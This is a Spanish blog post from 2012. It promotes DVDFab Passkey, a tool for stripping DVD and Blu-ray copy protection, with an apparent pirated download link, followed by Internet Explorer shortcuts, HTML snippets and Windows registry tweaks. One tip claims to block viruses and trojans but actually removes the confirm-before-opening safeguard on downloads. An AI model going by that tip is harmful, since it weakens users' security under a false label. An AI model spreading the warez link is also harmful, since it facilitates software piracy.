sábado, 16 de junio de 2012

DVDFab Passkey 8.0.4.4



Clave de acceso para DVD es la aplicación misma de que para ver cualquier DVD con el reproductor de región específica independientemente del código de región molesto. Y también puede eliminar todos los conocidos de copia de DVD de protección sólo en cuestión de segundos, y luego trabajar con una variedad de software para acceder a cualquier contenido del DVD. Realmente una herramienta poderosa y útil!

Clave de acceso para Blu-ray es un software versátil que puede ayudarle a deshacerse de todas las protecciones de Blu-ray en cuestión de segundos. Es libre de ver cualquier Blu-ray sin límite de región. Y, en particular, sino que también le permite usar cualquier utilidad compatible para tener acceso al contenido no protegido de acuerdo a sus necesidades. Clave de acceso para el uso de Blu-ray, puede abrir la puerta a un mundo libre de Blu-ray.

Clave de acceso para DVD
• Eliminar todas las protecciones de DVD conocido
• Trabajar con otros programas para acceder a cifrar el contenido del DVD
• Le permite ver cualquier DVD sin ningún tipo de límite

Características principales
• Descifrar cualquier DVD
Clave de acceso para DVD ayuda a los usuarios para descifrar cualquier DVD mediante la eliminación de todas las conocidas CSS, CPRM, CPPM, RC, RCE, APS, UOPs, ARccOS, RipGuard, FluxDVD, CORE X2, etc

• Libre ver DVD sin límite
Después de que el código de región y de las protecciones de copia se eliminan, lo que permite de ver cualquier DVD en el disco específico, regional o software de reproducción. No hay límite de más!

• Trabajar con una amplia gama de software para copiar, grabar, clonar ...
Después de las protecciones de copia de DVD se eliminan mediante clave de acceso para DVD, puede utilizar otro software para acceder y editar el contenido del DVD no protegidos ahora de acuerdo a sus necesidades como copiar, reproducir, quemar, etc, y clave de acceso para DVD puede trabajar con una gran cantidad de software, ha sido probado para trabajar con (no se limitan a):
- DVDFab DVD Copy
- DVDFab DVD Ripper
- PowerDVD 7/8/9/10
- TotalMedia theatra 3
- WinDVD 08/09/2010
- Roxio 2010 con el modo de E / S en 'avanzado' en la pestaña General
- ImgBurn (modo de lectura)
- CloneDVD
- Haga clic en un DVD Copy Pro - Advanced E / S sólo en modo
- Nero Recode
- Copia AVS
- DVD V3 Copiar junto y 4 (sin la machinist.dll)
- DVD Shrink - Off PathPlayer con algún contenido
- DVDSubEdit (comprobación rápida para que los subs forzados)
- VLC (VOB jugar con Archivo-> Abrir)
- Roxio Creator 9 en varios modos / modules
- DVDRanger sin machinist.dll
- XBMC Dharma Beta 2

Clave de acceso para Blu-ray
• Retire todos los conocidos de Blu-ray de protección
• Trabajar con otros programas para el acceso sin encriptar el contenido
• Le ayudará a ver cualquier Blu-ray sin límite de región

Características principales
• Desproteger cualquier Blu-ray
Clave de acceso para Blu-ray puede eliminar todos los conocidos AACS y BD + protecciones de copia, código de región, BD-Live, UOPs, MKB V18 y V19 más reciente MKB para Blu-ray.

• Haga que su software de reproducción multi-región
Clave de acceso para Blu-ray tiene la capacidad que le permite cambiar la configuración de región de los populares reproductores Blu-ray con un solo clic. Que hace que su software de reproducción esencialmente "region free" o más exactamente "multi-región".

• Disfrute de los Blu-ray con la ayuda de ningún tercero
Clave de acceso para Blu-ray le permite disfrutar de cualquier Blu-ray sin HDCP compatible con la tarjeta gráfica y sin HDCP compatible con la pantalla.

• Utilice software compatible para el acceso sin protección Blu-ray
Usted está autorizado a utilizar el software compatible con clave de acceso para Blu-ray sin protección para acceder a contenido Blu-ray para copiar, reproducir, quemar, etc, y clave de acceso para Blu-ray ha sido probado para trabajar con (no se limitan a):
- DVDFab Blu-ray Copy
- DVDFab Blu-ray Ripper
- DVDFab Blu-ray to DVD Converter
- PowerDVD 7/8/9/10
- TotalMedia theatra 3
- WinDVD 08/09/2010
- Roxio CineplayerBD 5
- Roxio 2010 con el modo de E / S en 'avanzado' en la pestaña General
- ImgBurn

 

Descarga eXtreme HaCkeR:

http://extabit.com/file/2dvnby5iu5v2y




Trucos de Internet
Atajos de teclado para Internet Explorer
Ctrl + L: Va a una nueva ubicación.
Ctrl + N: Abre una nueva ventana.
Ctrl + R: Actualiza la página actual.
Ctrl + O: Abre la ventana Organizar Favoritos.
Ctrl + P: Abre la ventana Imprimir.
Ctrl + B: Abre el cuadro de dialogo Organizar Favoritos.
Ctrl + D: Agrega la página actual a Favoritos.
Ctrl + E: Abre la barra de búsqueda.
Ctrl + F: Abre el cuadro Buscar en esta Página.
Ctrl + H: Abre la barra Historial.
Ctrl + I: Abre la barra Favoritos.
Ctrl + Tab: Avanzar entre marcos.
Ctrl+ F5: Forzar actualización.
Mays + Crtl + Tab: Retroceder entre marcos.
Mays + F10: Mostrar menú contextual de vínculo.
Mays + F1: Abre el índice de ayuda.
F 11: Abre el explorador a pantalla completa.
F 4: Muestra la lista de direcciones.
Alt + C: Cierra la vista preliminar.
Alt + Flecha derecha: Ir a la página siguiente en el historial.
Alt + Flecha izquierda: Ir a la página anterior en el historial.
Cambiar el color de fondo de la barra de tareas del naveg. y Explorador. Si deseamos poner un fondo personalizado para los botones del navegador, se puede poner cualquier imagen pero deber ser bmp sin importar el número de colores.
MANERA DE HACERLO :
Usar el editor del registro (REGEDIT.EXE) y abrir : HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerToolbar
Luego Edición
Nuevo Valor de la cadena
Póngale BackBitmap y una vez este hecha la cadena hacemos un doble click sobre ella y le indicamos el camino entero de la imagen que haya seleccionado.

Cambiar el nombre al Internet Explorer.

Para cambiar el nombre al Internet Explorer accede al Regedit y desde allí ve a:

HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main

Y allí, cambia el valor del "Window Title", que mostrará el nombre que tiene actualmente.

Imprimir correctamente una página web.
Para imprimir una página web como mismo aparece en internet,con los colores del texto e imágenes iguales,debemos en el menú Herramientas del IE,seleccionar las Opciones de Internet y en la pestaña de Avanzadas,marcar la opción de Imprimir colores e imágenes de fondo.

Convertir un PDF a HTML.
En Internet encontramos mucha información en formato PDF. La lástima es que no podemos usar esa información mediante la maravillosa técnica de "copiar y pegar" útil hasta para componer "best-sellers" en pocos minutos.

Pero si accedemos a la URL http://access.adobe.com/simple_form.html y copiamos y pegamos, la URL del documento PDF que nos interese asistiremos a su mágica conversión en un fichero HTML que nos permitirá usar nuestra habilidad "Ctrl+C-->Ctrl+V".
Como no todo es perfecto no nos muestra las imágenes. Pero... ¿para qué están las teclas "Alt+ImprPant" o los programas capturadores de pantalla?

Eliminar sonidos indeseados de páginas web.
A muchos de nosotros nos resulta muy molesto el sonido de música de fondo, (inesperado por cierto), que emiten ciertas páginas web (generalmente realizadas por principiantes).

Para desactivarlo permanentemente siga estos pasos:
Vaya al menú Herramientas/Opciones de Internet y seleccione la solapa Opciones avanzadas
Vaya a la sección Multimedia y desmarque la casilla de verificación con la leyenda Reproducir sonidos en páginas web

Otra opción, si no desea deshabilitar totalmente el sonido, es pulsar el botón Detener una vez que la página haya terminado de cargar, y la música de fondo desaparecerá.
Ver todos los enlaces que contiene una pagina web.
Las páginas web suelen tener enlaces a muchas otras páginas, para verlos sin tener que buscar por toda la página debes: acceder a la página en cuestión, una vez cargada seleccionamos el menú "herramientas" y después la opción "mostrar vínculos relacionados", a la izq. de la página
aparecerá una ventana con todos los enlaces que tiene esa página (la velocidad de aparición depende de la velocidad de su conexión).

Deshabilitar la descarga de virus, troyanos y dialers en IE.
Este truco es muy recomendable para filtrar y limitar la descarga de los usuarios para prevenir la aparición de virus, troyanos y dialers en el sistema.

Para realizar este truco debe seguir los siguientes pasos:

1- Hacemos clic en el botón Inicio, Configuración y finalmente Panel de control
2- Doble clic en Opciones de carpetas (o Herramientas, Opciones de carpetas)
3- Seleccionamos la lengüeta "Tipos de archivos"
4- Buscamos la extensión del tipo de archivo que deseamos recibir sin que sea bloqueada por el programa y la señalamos (si la extensión no está en la lista, tendremos que deshabilitar toda la protección contra adjuntos peligrosos como se indica más adelante).
5- Hacemos clic en "Opciones avanzadas".
6- Desmarcamos la opción "Confirmar apertura después de la descarga".
7- Finalmente hacemos clic en el botón ACEPTAR para confirmar los cambios.

Cómo cargar las páginas web sin imágenes.
Cuando nuestra conexión a Internet es exageradamente lenta podemos optar por un remedio para salir del paso y que es desactivar las imágenes (también podemos desactivar los sonidos, vídeos, animaciones), puesto que son las que más tardan en cargar, para ello accedemos al menú Herramientas – Opciones de Internet – Ficha Avanzadas, buscamos el grupo Multimedia y desactivamos la casilla Mostrar imágenes, se nos presentará un hueco en la posición de cada imagen y si el autor de la página web incluyó texto para la propiedad ALT de la etiqueta IMG, en el recuadro asignado a la imagen aparecerá ese texto, que generalmente contendrá una descripción de ésta o el texto si se trata de un botón gráfico.
Códigos HTML
Solo hay que copiar estos códigos y pegarlos en la página deseada.
Codigos HTML
Música de Fondo
A continuación os pondré el código que será necesario si quieres poner música de fondo dentro de una pagina, recuerda que solo podrás poner música en formato wav o midi.

<bgsound src="cancion.wav" loop="-1">

Recuerda que este código tal y como esta puesto, te obliga a que la canción este en el mismo directorio de la pagina donde tengas puesto el código. En caso de que quieras poner por ejemplo el tema en otra carpeta que por ejemplo se llame música, el código seria el siguiente:

<bgsound SRC="musica/cancion.wav" loop="-1">

En este código le estas diciendo, que abra la canción que se llama canción, dentro de la carpeta música. En el código que pone Loop, si lo pones en -1 como esta puesto, el bucle será infinito, con eso quiere decir que nunca dejara de sonar y siempre se repetirá la canción.
Otra forma de ponr musica...
<EMBED SRC="Cancion.wav "
AUTOSTART="TRUE" HIDDEN="TRUE" LOOP="TRUE"> <NOEMBED> <BGSOUND SRC="Cancion.wav "
LOOP="INFINITE"> </NOEMBED>
Barra de Scroll de Color
En el código inferior tienes las etiquetas para poder poner las barras de colores, prueba a cambiar los colores hasta dar con e el que buscas. Por lo que podrás comprobar, está hecho con hojas de Estilos.
<style type="text/css">
<!--
body {
scrollbar-face-color: #FEFFA2;
scrollbar-shadow-color: #FEFFA2;
scrollbar-highlight-color: #FEFFA2;
scrollbar-3dlight-color: #FEFFA2;
scrollbar-darkshadow-color: #FEFFA2;
scrollbar-track-color: #FFFFFF;
scrollbar-arrow-color: #FEFFA2
}
-->
</style>
Aqui tienes otro ejemplo para las barras, usa el que mas te guste.
<style>
<!--
body { scrollbar-face-color: darkgreen ;
scrollbar-shadow-color: yellow;
scrollbar-highlight-color: violet;
scrollbar-3dlight-color: navy;
scrollbar-darkshadow-color: magenta;
scrollbar-track-color: blue;
scrollbar-arrow-color: black }
-->
</style>
Quitar el subrallado de los links
Ponerlo antes del <body>
<style>
A:link {text-decoration: none}
A:visited {text-decoration: none}
A:active {text-decoration: none}
A:hover {text-decoration: none}
</style>

Imagen de Fondo Estática (No se mueve)
<body background="imagen.jpg" bgproperties="fixed">

Prueba con cualquiera de estas tres.

<body bgproperties="fixed" background="imagen.gif">

<body bgcolor="white" text="blue" link="blue" vlink="blue" alink="blue" background="imagen.jpg" bgproperties="fixed">

Marquesina

Desplazar
<marquee style="color: #FF0000; font-family: Verdana; font-size: 8pt; text-decoration: underline">Prueba</marquee></p>Prueba

Deslizar
<marquee style="color: #FF0000; font-family: Verdana; font-size: 8pt; text-decoration: underline" behavior="slide">Prueba</marquee>
Prueba

Alternar
<marquee style="color: #FF0000; font-family: Verdana; font-size: 8pt; text-decoration: underline" behavior="alternate">Prueba</marquee>
Prueba

Si quieres que la marquesina no salga subrayada, quitale el decoration: Underline.
Si quieres que salda de derecha a izquierda, añadele este texto después de algunas de las comillas: dirección="right"

Si quieres que no se pepita mas de una vez, añadele esto despues de una de las comillas: loop="1", y si quieres que se repita mas de una vez, pues cambiale el numero.

Si le añades el siguiente codigo quete pongo a continuación, y le cambias la numeración, cambiaras la velocidad de movimiento:
scrollamount="2" scrolldelay="50"
Añadir la web a Favoritos
<a href="javascript:window.external.AddFavorite('http://www.dream-es.com','dream-es')" onFocus="if(this.blur)this.blur()">A Tus Favoritos</a>
Página de Inicio
<a href="#" onClick="this.style.behavior='url(#default#homepage)';
this.setHomePage('http://www.dream-es.com');return false;" onFocus="if(this.blur)this.blur()">
Paguina de Inicio </a>
Trucos de XP

Sincronizar el reloj con el horario de Internet

Está tu equipo en hora. Si tu equipo no forma parte de un dominio, puede sincronizar el reloj del equipo con un servidor horario de Internet. Para ello:
Haz doble clic en la hora de la barra de tareas.
Haz clic en la ficha Hora de Internet.
Selecciona el servidor horario que deseas utilizar y asegúrate de activar la casilla de verificación Sincronizar automáticamente con un servidor horario de Internet.
Asegúrate de que has configurado la fecha correcta antes de intentar sincronizar el reloj ya que el servidor horario de Internet no actualizará la hora si la fecha no es correcta. Si tienes un servidor de seguridad personal o de red, puede que tengas que realizar algún cambio en la configuración para desbloquear la sincronización.
Teclado en Pantalla

Windows XP incluye un teclado en pantalla. Puede ser útil si tienes dificultades de movilidad, si estás utilizando un equipo de tableta o si se daña el teclado. Para tener acceso al teclado, vete a Inicio, haz clic en Ejecutar y escribes osk. Entonces el teclado se abrirá en la pantalla y ofrecerá tres modos de escritura que puedes utilizar para escribir datos.
El modo de clic, harás clic en las teclas en pantalla.
El modo de digitalización, presionarás una tecla de acceso rápido o utilizarás un dispositivo de cambio para escribir caracteres resaltados.
El modo de suspensión, utilizará un ratón o joystick para seleccionar una tecla, que aparecerá escrita.
Para crear en el escritorio un icono de acceso directo al teclado en pantalla:
Haz clic con el ratón derecho en el escritorio.
Selecciona Nuevo y, a continuación, haz clic en Acceso directo.
Escribe osk, haz clic en Siguiente.
Escribe un nombre para el acceso directo y, a continuación, haz clic en Finalizar.
Ya está. Cuando necesites, la utilidad de acceso de directo al teclado en pantalla estará en el escritorio.

Teclas de acceso rápido



Estas son algunas combinaciones del Teclado utilizadas por Windows XP. Con estas combinaciones de teclas accederás rápidamente a cada función.
Tecla Windows + Tecla D: Minimizar o restaurar todas las ventanas
Tecla Windows + Tecla E: Windows Explorer
Tecla Windows + Tecla F: Búsqueda de archivos
Tecla Windows + Ctrl + Tecla F: Buscar en equipo
Tecla Windows + Tecla F1: Ayuda
Tecla Windows + Tecla R: Ejecutar
Tecla Windows + Tecla mayúsculas + Tecla M: deshacer minimizar ventanas
Tecla Windows + Tecla L: Bloqueo de la estación de trabajo
Tecla Windows + Tecla U: Administrador de utilidades
Tecla Windows + Tecla Pausa: Sistema

Un icono para cada librería DLL


si encuentras aburrido el icono que representa los archivos ".dll" de las librerías dinámicas, podemos configurar el registro para que cada uno de estos archivos muestre su propio icono, si bien no todos ellos incluyen uno, por lo que éstos se mostrarán con el icono de tipo "tipo desconocido". Para realizar este truco debes seguir estos pasos:
Comenzaremos haciendo clic en el botón Inicio y luego en Ejecutar, ahora escribimos Regedit y pulsamos el botón Aceptar.
Ahora nos desplazamos por las siguientes claves:
HKEY_CLASSES_ROOT\dllfile\DefaultIcon
Ahora modificaremos el contenido del valor (Predeterminado) con %1 (sin comillas.
Si queremos volver al ajuste predeterminado, modficaremos el contenido con la cadena "%SystemRoot%\System32\shell32.dll,-154. De la misma forma se comportan los archivos .cpl que representan los applets del panel de control. Para que cada uno de estos archivos muestre su icono dentro del explorador de Windows, localizaremos la cadena HKEY_CLASSES_ROOT\cplfile y añadiremos una subclave DefaultIconcuyo valor (Predeterminado) estableceremos en %1. Reiniciaremos el sistema para aplicar los cambios.

Velocidad de descarga en la transferencia de archivos


Windows XP nos brinda la oportunidad de ver en gráficos la velocidad en la transferencia de archivos, bien sea cuando descargamos algo de la red, como archivos o páginas web, o bien cuando somos nosotros los que hacemos de servidor y están descargando algo de nuestro ordenador. La forma de obtenerlo es la siguiente:
Hacemos clic con el ratón derecho sobre una zona libre de la barra de tareas, junto al botón inicio y luego sobre Administrador de tareas.
Seguidamente se abrirá el Administrador de tareas, ahora hacemos clic sobre la pestaña Funciones de Red y es en este gráfico donde se muestra nuestra actividad en la red.

Cambiar el puntero del ratón


Windows XP ofrece muchas posibilidades a la hora de cambiar el puntero del ratón. Puedes cambiar todos los punteros a la vez o puedes cambiarlos de manera individual, según los gustos.
Para cambiar los punteros sigue estos pasos:
Haz clic en el botón Inicio y después en Panel de Control.
Ahora haces doble clic sobre el icono Mouse.
Haz clic en la pestaña Punteros.
En el apartado esquema puedes escoger el tipo de esquema de punteros que desees y luego en Personalizar escoges el puntero que quieras.
Una vez elegido el puntero y esquema, Aceptas la ventana y la cierras, la próxima vez que reinicies todos los punteros elegidos estarán activos.

Remover los documentos compartidos


Para quitar de MI PC la opción [Documentos Compartidos] (Shared Documents), abrimos el Editor de Registro y nos dirigimos a la rama [HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Explorer\ MyComputer\ NameSpace\ DelegateFolders].
Allí localizamos la rama {59031a47-3f72-44a7-89c5-5595fe6b30ee} y la borramos. Reiniciamos y ¡listo!

No se apaga el CPU


Si cuando se apaga el equipo solo lo hace el Monitor, es decir se apaga el Monitor y la CPU sigue en marcha, teniendo que quitar el cable de alimentación para que se apague también la CPU.
Para conseguir que se apague todo a la vez tal como lo hacía Windows 98 seguiremos estos pasos:
Haces clic con el botón Inicio y a continuación en Panel de Control.
Una vez en el Panel de Control, haz doble clic sobre el icono de Opciones de energía.
Pincha en la pestaña APM y marca la casilla Habilitar la compatibilidad con la administración avanzada de energía luego pulsa el botón Aceptar. La próxima vez que apagues tu equipo verás como se apaga todo a la vez, tal como lo hacía Windows 98.

Cambiar la carpeta predeterminada del Explorador de Windows



El explorador de Windows de forma predeterminada, se abre mostrando la carpeta Mis documentos. Para cambiar los valores predeterminados y que se muestren todas las unidades y carpetas de nivel superior, sigue estos pasos:
Haces clic en en el botón Inicio, luego seleccionas Programas, Accesorios, después, haces clic en Explorador de Windows y, a continuación, haces clic en Propiedades.
En el campo Destino, en el que aparece %SystemRoot%\explorer.exe, agregas lo que falta para que en la línea aparezca %SystemRoot%\explorer.exe /n, /e, /select, C:\
Haces clic en Aceptar.
Ahora, cuando abras el Explorador de Windows podrás elegir de todas las carpetas y unidades, y no sólo de Mis documentos.

Como acceder a las propiedades del sistema



Para deshabilitar el ratón derecho y que no pueda mostrar los menús contextuales cuando hacemos clic sobre el Escritorio o sobre el Explorador, sigue eEste truco es válido para Windows 95, 98, Me, 2000 y XP, y acaba de llegar de un colaborador de El Portal de Windows 05/05/02.
Consiste en Pulsar simultáneamente las teclas de Windows + tecla Pausa, si no lo consigues a la primera inténtalo nuevamente y seguro que te saldrá en pantalla.

Bloquear las barras de herramientas



Ahora en Windows XP las barras de herramientas se pueden bloquear y puedes ajustarlas. Puedes personalizar muchas funciones de Windows XP como la Barra de tareas, el menú Inicio e incluso los iconos de la barra de tareas de Internet Explorer y de Outlook Express. Recuerda el clic con el ratón derecho:
• Haz clic con el ratón derecho en una barra de herramientas y, a continuación, haz clic en Bloquear las barras de herramientas para quitar la marca de verificación.
• Haga clic de nuevo con el ratón derecho en la barra de herramientas y, a continuación, haz clic en Personalizar.
Puedes agregar y quitar botones de la barra de herramientas, cambiar opciones de texto y opciones de iconos. Cuando tengas personalizada la barra de herramientas, haz clic en Cerrar. Ahora, haga clic con el ratón derecho en la barra de herramientas y, a continuación, haz clic en Bloquear la barra de herramientas para bloquearla automáticamente.

Deshabilitar servicios



Al iniciarse, Windows XP ejecuta muchos programas que permanecen cargados en segundo plano, consumiendo recursos del sistema y haciendo que todo sea un poco mas lento, y que a veces son innecesarios. Estos programas consumen bastante memoria. Para deshabilitar estos servicios sigue estos pasos:
1. Hacemos clic en el botón Inicio, después en Ejecutar y escribimos services.msc
2. En la ventana que aparece hacemos clic con el ratón derecho sobre el servicio que deseamos deshabilitar
3. Elegimos Propiedades
4. En la opción Tipo de Inicio seleccionamos Deshabilitado y listo de esta forma habremos deshabilitado los servicios que consideremos oportuno con el consiguiente ahorro de memoria.

Ver las sugerencias del día


Windows XP nos sigue dando ideas: Haz doble clic sobre el icono "MiPC" del escritorio de Windows y verás su contenido, luego despliega el menú "Ver" , colócate sobre "Barra del explorador" y haz clic en el comando "Sugerencia del día". Automáticamente, en un nuevo panel de la parte inferior de la ventana podrás visualizar la primera sugerencia que Windows Xp te ofrece.
Este truco es igualmente válido para Windows 98 y Windows Me.

Volver al inicio clásico de Windows


Al comenzar a trabajar con Windows XP muchas veces hechamos de menos el menú de inicio clásico de Windows, pues bien Windows XP tiene una opción con la que se puede volver a obtener el menú clásico de Windows, para ello sigue estos pasos:
Haces clic con el ratón derecho sobre la barra de inicio, junto al botón Inicio
Seleccionas Propiedades
Haz clic sobre la pestaña Menú Inicio y marca la casilla Menú inicio clásico
Acepta para que se apliquen los cambios y listo, ahora cuando pulses sobre el botón Inicio volverás a ver el menú clásico de Windows.

Volver a las carpetas clásicas de Windows


Si lo que deseas es volver a ver las carpetas clásicas de Windows, debes hacer lo siguiente:
Abre cualquier carpeta y luego haces clic en el menú Herramientas y a continuación sobre Opciones de carpeta.
En la ficha General debes activar la opción Utilizar las carpetas clásicas de Windows
Luego pulsa el botón Aceptar para que los cambios surtan efecto y de esta forma a partir de ahora verás las carpetas clásicas de Windows.

Zoom


Para acceder al zoom primero debes ir a Inicio, luego Todos los programas, Accesorios, Accesibilidad y finalmente sobre Ampliador, pero tamibién puedes hacerlo desde el Administrador de utilidades, con el cual puedes activar el Ampliador o el teclado en pantalla, tal como se muestra en la siguiente figura, sólo tendrías que seleccionar uno de los dos y luego pulsar el botón Iniciar.
Cambio rápido de usuario

Windows XP brinda soporte un muy bueno para múltiples cuentas de usuario. Por ejemplo, es posible cambiar de usuario sin cerrar la sesión y mantener la conexión a Internet y los programas abiertos. Para aprovechar esto, es recomendable tener activado el Cambio rápido de usuario, ya que, por lo general, no viene configurado de manera predeterminada en Windows. Esta característica permite, mediante las teclas [WINDOWS] + L , acceder a la pantalla de bienvenida para elegir otro usuario. Si nuestro teclado no tiene la tecla [WINDOWS], podemos acceder a esta característica desde [Inicio/Cerrar sesión].
Para activar el Cambio rápido de usuario, es preciso dirigirse a [Inicio/Panel de control/Cuentas de usuario] y, en la ventana que aparece, hacer clic en [Cambiar la forma en que los usuarios inician y cierran sesión]. Acá hay que marcar dos opciones: [Usar la pantalla de bienvenida] y [Usar Cambio rápido de usuario].
Claro, no tendrá mucho sentido hacer esto si no creamos un nuevo usuario o activamos la cuenta de invitado.
Trucos de Windows

Eliminar las flechas de acceso directo


Cuando hacemos un acceso directo, sobre el ícono nos aparece una pequeña flechita abajo y a un costado. Para eliminar esta "flechita" del ícono, debereás hacer lo siguiente:

1) Abrir el Editor del Registro de Configuraciones (Regedit).

2) Andá a HKEY_CLASSES_ROOT\Lnkfile, y eliminá la clave IsShortCut.

3) Tendrás que hacer lo mismo que en el paso 2), pero en HKEY_CLASSES_ROOT\piffile


Cambiarle el nombre a la Papelera de Reciclaje

Para cambiarle el nombre a la Papelera de Reciclaje, sólo tienes que hacer esto:
1) Abrimos Regedit, y vamos a:

HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}

2) Allí veremos que dice "Papelera de Reciclaje".
3) Editamos este campo, y ponemos el nombre que queremos.


Apagar el sistema rápidamente

1) Creen un acceso directo, y en la línea de comando escriben: C:\WINDOWS\RUNDLL32.EXE user.exe,ExitWindows

2) De nombre le ponen "Apagar el Sistema", "Cerrar Windows" o lo que quieran.

Ya está listo, cada vez que hagan 2 click, Windows se cerrará automáticamente, sin preguntarte nada


Copia de seguridad del registro de Windows

Para hacer una copia de seguridad del registro nada más fácil, hacemos lo siguiente

1) hacemos clic en el menú Registro y nuevamente clic en Exportar archivo Registro...

en la siguiente ventana le damos el nombre que queramos en este caso como se trata de una copia de seguridad le daremos el mismo nombre es decir Regedit, y especificamos donde lo vamos a guardar. Una vez que termine de guardarlo ya lo podremos utilizar posteriormente para restaurarlo.

Restaurar el registro desde la copia de seguridad

Al igual que en el caso de la copia de seguridad, en este caso seleccionamos Registro y clic en Importar archivo del Registro... en la ventana que nos muestra seleccionamos la ruta de acceso a la copia que teníamos guardada y hacemos clic en Abrir, el Registro se actualizará de forma automática.

Borrar Programador de Tareas

Con este truco podrás hacer que no salga el Programador de Tareas cada vez que se inicia el sistema
1) Ir al Regedit
2) Buscar la clave [[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]\RunServices]

3) Borrar la clave "SchedulingAgent" que contiene el "mstask.exe"

De la misma manera podemos borrar todos los programas que no queramos que se inicien de la Rama [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

Eliminar el "Click aqui para empezar" del "Menú Inicio"
1) Regedit
2) Buscar [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

3) En la Clave NoStartBanner (valor Binario")

4) Modificar el valor poniendo 00 00 00 00 = disabled, 01 00 00 00 = enabled)

Deshabilitar poder modificar el Menu Inicio con el boton derecho
1) Regedit
2) Buscar Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
3) En la Clave NoChangeStartMenu crear un nuevo valor DWORD con Data: (0 = disable restriction, 1 = enable restriction)

Que no aparezca el "Cerrar el Sistema" en el Menu Inicio
1) Regedit
2) Buscar Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
3) Buscar valor " NoClose"
4 Nuevo valor "DWORD"
con valor 0 = Cerrar el sistema aparece y con valor 1 = Cerrar el Sistema no aparece

Eliminar todos los iconos del Escritorio
1) Regedit
2) Buscar Key:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]


3) Crear Valor "NoDesktop" que es DWORD)
4) Data: (0 = disabled = enabled)

Eliminar "Buscar" del Menu Inicio
1) Regedit
2) Buscar Key:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
Value Name: NoFind
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled)

(Siempre es Inglés aunque tengas el Windows 95/98 en Castellano)

Eliminar "Ejecutar" del Menu Inicio
1) Regedit
2) Buscar Key:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
Value Name: NoRun
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled)


(Siempre es Inglés aunque tengas el Windows 95/98 en Castellano)

Eliminar "Ayuda" del Menu Inicio y otros.....
1) Regedit
2) Buscar Key:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
Value Name: NoSMHelp
Data Type: REG_DWORD
Data: (0 = disable restriction, 1 = enable restriction

Para eliminar "Panel de Control"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
Value Name: NoControlPanel
Data Type: REG_DWORD
Data: (0 = disable restriction, 1 = enable restriction

Para eliminar Impresoras:
Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
Value Name: NoPrinters
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled)

Para eliminar Documentos:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
Value Name: NoRecentDocsMenu
Data Type: REG_DWORD
Data: (0=disable, 1=enable)

(Siempre es Inglés aunque tengas el Windows 95/98 en Castellano)

Impedir ejecución de algunos programas
1) Regedit
2) Buscar Key:

Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]


3) Crear Valor " RestrictRun"

4)Añadir Valor DWORD para cada programa y escribir el nombre de la aplicación "notepad.exe", "regedit.exe", etc

Más Accesorios en el "Menú Inicio"
Con este truco podrán poner Carpetas de Sistema en el Menú Inicio.
1) Aprete el botón secundario del mouse sobre Inicio
2) Seleccione la opción Explorar
3) Diríjase a donde quiere que aparezca la "carpeta de sistema"
4) Cree una carpeta, y de nombre, ingrese este:

Acceso telefónico a redes.{992CFFA0-F557-101A-88EC-00DD010CCC48}

Impresoras.{2227A280-3AEA-1069-A2DE-08002B30309D}

Bandeja de entrada.{00020D75-0000-0000-C000-000000000046}

Mi PC.{20D04FE0-3AEA-1069-A2D8-08002B30309D}

Papelera de reciclaje.{645FF040-5081-101B-9F08-00AA002F954E}

Entorno de red.{208D2C60-3AEA-1069-A2D7-08002B30309D}

Escritorio.{00021400-0000-0000-C000-000000000046}

Maletín.{85BBD920-42A0-1069-A2E4-08002B30309D}

5) Basta con equivocarse en una sola letra o en un sólo número, y no funcionará el truco.
*) Mi sugerenecia: copien todas estas letras y números, los pegan.

Funciona tanto en el Menú Inicio, como en el Escritorio o en cualquier otra carpeta.

Cambiar el logo que aparece en el inicio de Windows
¿Cansados de ver siempre la ventana de Windows al iniciar nuestro Sistema Operativo?

Bueno, con este truco, esto dejó de ser un problema. Para cambiar esta "Splash Screen", deberán hacer lo siguiente:

1) Con cualquier programa para imágenes, por ejemplo PAINT (sí, oiste bien, el que trae Windows 95), deben crear un mapa de bits de 320x480x8bits.

2) Guárdalo con el nombre logo.sys, y guárdalo en la carpeta C:\ (no te olvides de realizar una copia de este archivo, antes de reemplazarlo). Y mejor que lo renombres de logo.bmp a logo.sys desde MS-DOS.

3) Arranquen la máquina, y listo !

Agregar o quitar programas
Desde Agregar o quitar programas, podemos desinstalar automáticamente algunos programas que hemos instalado. Pero al borrar un programa manualmante, nos va a quedar el nombre en Agregar o quitar programas. No va a pasarle nada a nuestra PC, pero no es muy lindo tener la opción de desinstalar un programa que ya hemos borrado. Para borrar el nombre de esta lista, debemos hacer los siguiente:

1) Abrir el Regedit

2) Ir a la cadaena HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

3) Una vez aquí, buscamos la calve del programa que queremos desinstalar y la eliminamos

*) Si nos consta que el programa ya está eliminado del todo, ni nos molestamos en hacer un backup, pero por las dudas ...

Ocultar programas para evitar su desinstalación
1) Ejecutar Regedit

2) Buscar HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrrentVersion\Uninstall

3) En la parte derecha aparecen los programas que se puede eliminar desde "Agregar y quitar programas)

